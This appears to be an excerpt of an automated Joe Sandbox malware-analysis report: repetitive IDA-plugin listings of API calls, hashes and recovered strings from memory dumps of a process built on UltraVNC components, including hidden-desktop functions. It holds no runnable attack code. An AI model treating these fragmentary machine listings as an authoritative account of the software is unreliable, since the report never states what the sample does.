                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CriticalInitializeSection
                                                                            • String ID:
                                                                            • API String ID: 4164307405-0
                                                                            • Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                            • Instruction ID: 7daaed739751b8325d473ed16f8c57f04a8d8a63f07906fd88af5228debf1ed6
                                                                            • Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                            • Instruction Fuzzy Hash: 0001CE72504B4182DB40CF25E9840A8B3B8FBA8B99B140136CF8D867A8CF78C8A5C380
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: gethostbynamesprintf
                                                                            • String ID: %d.$IP address unavailable
                                                                            • API String ID: 4032199589-2983120142
                                                                            • Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                            • Instruction ID: a84a174758250e37a31f28f3de7395acb4cebb8263116f52cc4c768f05b613cd
                                                                            • Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                            • Instruction Fuzzy Hash: 4A41A022618A8581E660CF25A84016AB7B0FB85BF9F445735EFEE83BD5DF7CD0558700
                                                                            APIs
                                                                            • LoadCursorA.USER32 ref: 00007FF6C2BB0925
                                                                              • Part of subcall function 00007FF6C2BAD930: InitializeCriticalSection.KERNEL32 ref: 00007FF6C2BAD95E
                                                                              • Part of subcall function 00007FF6C2BAD930: InitializeCriticalSection.KERNEL32 ref: 00007FF6C2BAD9EB
                                                                              • Part of subcall function 00007FF6C2BAD930: LoadLibraryA.KERNEL32 ref: 00007FF6C2BADA0D
                                                                              • Part of subcall function 00007FF6C2BAD930: GetProcAddress.KERNEL32 ref: 00007FF6C2BADA30
                                                                              • Part of subcall function 00007FF6C2BAD930: LoadLibraryA.KERNEL32 ref: 00007FF6C2BADA51
                                                                              • Part of subcall function 00007FF6C2BAD930: GetProcAddress.KERNEL32 ref: 00007FF6C2BADA6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
                                                                            • String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
                                                                            • API String ID: 2513085289-3031267129
                                                                            • Opcode ID: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                            • Instruction ID: 00f5fc83e6842f0fcacc81e34be896bd805648454ad3c64a6e91487598b908e7
                                                                            • Opcode Fuzzy Hash: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                            • Instruction Fuzzy Hash: 5F218B31608B8282E7489F60E9401E9B3A8FB49B98F440636DBEC93795DFBCE021C300
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DesktopInputOpen
                                                                            • String ID: Default
                                                                            • API String ID: 601053899-753088835
                                                                            • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                            • Instruction ID: e6f80fbaa10bbdb891a9661d1bf8b7229dc3481040dcdd5e7ba96bb716820060
                                                                            • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                            • Instruction Fuzzy Hash: 74215B35A18A8282EAA5CF11A4117EA73A5FB8A749F840471DECD83B94DFBCD018CB40
                                                                            APIs
                                                                            Strings
                                                                            • HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF6C2B8A89F
                                                                            • HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF6C2B8A8B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorInfoLastParametersSystem
                                                                            • String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
                                                                            • API String ID: 2777246624-1049114938
                                                                            • Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                            • Instruction ID: 8ef01eaafd1a70f6a8b6544f39f456abe49313fd60ec8403e3af22bb2dd65b36
                                                                            • Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                            • Instruction Fuzzy Hash: 73213A36A08B8286E7548F11E8406A977A0FB8574EF540136DFCE97B58DFBCE546CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID: fake %d down$fake %d up
                                                                            • API String ID: 4278518827-2496597273
                                                                            • Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                            • Instruction ID: 2374b1c69eb53d261adbecaac69d7e43bfa42feba4cb3e8f6dedd45cedf5222f
                                                                            • Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                            • Instruction Fuzzy Hash: BC010421F0828182E3509F26A0401BD7BA2AF8970DF58C436DECD833A6CEBCD446C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcessWindow$CurrentFindThread
                                                                            • String ID: WinVNC Tray Icon
                                                                            • API String ID: 1332243453-1071638575
                                                                            • Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                            • Instruction ID: 2170a589e11191cb86af353ce657d8dbc939bf29c9d0fef4e40003e8fd66a1bb
                                                                            • Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                            • Instruction Fuzzy Hash: 46F03021A1874182EB949F56B481479A2A0FF8878AF891076EF9E86754EF7CD485CB40
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF6C2C3ABE5,?,?,00000028,00007FF6C2C38C7D,?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749), ref: 00007FF6C2C3ABAB
                                                                            • GetProcAddress.KERNEL32(?,?,000000FF,00007FF6C2C3ABE5,?,?,00000028,00007FF6C2C38C7D,?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749), ref: 00007FF6C2C3ABC0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 1646373207-1276376045
                                                                            APIs
                                                                            • malloc.LIBCMT ref: 00007FF6C2BA2328
                                                                              • Part of subcall function 00007FF6C2C38C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6C2C38C64
                                                                              • Part of subcall function 00007FF6C2C38C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749,?,?,?,00007FF6C2C477F3), ref: 00007FF6C2C38C89
                                                                              • Part of subcall function 00007FF6C2C38C34: _callnewh.LIBCMT ref: 00007FF6C2C38CA2
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CAD
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CB8
                                                                            • free.LIBCMT ref: 00007FF6C2BA2564
                                                                            • free.LIBCMT ref: 00007FF6C2BA2617
                                                                              • Part of subcall function 00007FF6C2C38BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C0A
                                                                              • Part of subcall function 00007FF6C2C38BF4: _errno.LIBCMT ref: 00007FF6C2C38C14
                                                                              • Part of subcall function 00007FF6C2C38BF4: GetLastError.KERNEL32(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C1C
                                                                            Strings
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6C2BA230B
                                                                            Similarity
                                                                            • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                            • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
                                                                            • API String ID: 1063416079-2438250478
                                                                            Similarity
                                                                            • API ID: DataRegion$DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 3467850875-0
                                                                            Similarity
                                                                            • API ID: _errno$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2819658684-0
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
                                                                            • String ID: G
                                                                            • API String ID: 2834860089-985283518
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 948891078-0
                                                                            APIs
                                                                            • malloc.LIBCMT ref: 00007FF6C2C03CCE
                                                                              • Part of subcall function 00007FF6C2C38C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6C2C38C64
                                                                              • Part of subcall function 00007FF6C2C38C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749,?,?,?,00007FF6C2C477F3), ref: 00007FF6C2C38C89
                                                                              • Part of subcall function 00007FF6C2C38C34: _callnewh.LIBCMT ref: 00007FF6C2C38CA2
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CAD
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CB8
                                                                            • free.LIBCMT ref: 00007FF6C2C03CFA
                                                                              • Part of subcall function 00007FF6C2C38BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C0A
                                                                              • Part of subcall function 00007FF6C2C38BF4: _errno.LIBCMT ref: 00007FF6C2C38C14
                                                                              • Part of subcall function 00007FF6C2C38BF4: GetLastError.KERNEL32(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C1C
                                                                            • free.LIBCMT ref: 00007FF6C2C03D0E
                                                                            Similarity
                                                                            • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                            • String ID: Unable to allocate memory in zip library at %s
                                                                            • API String ID: 1063416079-1743894623
                                                                            Similarity
                                                                            • API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
                                                                            • String ID:
                                                                            • API String ID: 1747828912-0
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32 ref: 00007FF6C2BA92F0
                                                                              • Part of subcall function 00007FF6C2C17520: EnterCriticalSection.KERNEL32 ref: 00007FF6C2C17534
                                                                              • Part of subcall function 00007FF6C2C17520: ReleaseSemaphore.KERNEL32 ref: 00007FF6C2C17577
                                                                              • Part of subcall function 00007FF6C2C17520: GetLastError.KERNEL32 ref: 00007FF6C2C17581
                                                                              • Part of subcall function 00007FF6C2C17520: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2C1758C
                                                                              • Part of subcall function 00007FF6C2C17400: EnterCriticalSection.KERNEL32 ref: 00007FF6C2C17427
                                                                              • Part of subcall function 00007FF6C2C17400: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2C17472
                                                                              • Part of subcall function 00007FF6C2C17400: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2C1747B
                                                                              • Part of subcall function 00007FF6C2C17400: WaitForSingleObject.KERNEL32 ref: 00007FF6C2C1748A
                                                                              • Part of subcall function 00007FF6C2C17400: EnterCriticalSection.KERNEL32 ref: 00007FF6C2C17495
                                                                              • Part of subcall function 00007FF6C2C17400: GetLastError.KERNEL32 ref: 00007FF6C2C174A7
                                                                              • Part of subcall function 00007FF6C2C17400: EnterCriticalSection.KERNEL32 ref: 00007FF6C2C174DE
                                                                              • Part of subcall function 00007FF6C2C17400: LeaveCriticalSection.KERNEL32 ref: 00007FF6C2C17500
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
                                                                            • String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
                                                                            • API String ID: 1962697109-2518527632
                                                                            • Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                            • Instruction ID: 0904bc800261134cc6dd17a525c78124cd6d9a3732fbdf99749c0c39e9cf17bc
                                                                            • Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
                                                                            • Instruction Fuzzy Hash: 34113A31A09A8282EB40DF25D8506A973B1FB85BADF484235DE9E873E9DFBCD405C700
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _amsg_exit$_getptd_lockfree
                                                                            • String ID:
                                                                            • API String ID: 2148533958-0
                                                                            • Opcode ID: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                            • Instruction ID: 41eb0729d0010a6f47f7b8039947623b238622321281475f98fec1c645f75cd5
                                                                            • Opcode Fuzzy Hash: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
                                                                            • Instruction Fuzzy Hash: FD114F2AA19A4182EBD49F20E4407BA3370FF5478AF485136DF8E83795DFACE455C741
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$DeleteEnterEventLeave
                                                                            • String ID:
                                                                            • API String ID: 3772564070-0
                                                                            • Opcode ID: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                            • Instruction ID: 4d25a717ec61e4dc0500db684256215ba30cae0a3d272816f8efc1320f3d7fcb
                                                                            • Opcode Fuzzy Hash: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                            • Instruction Fuzzy Hash: 0821DB65919E8685FB54DF16E85437423B0AFA9B4EF440131CD8EC2B70CFBCA495D351
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
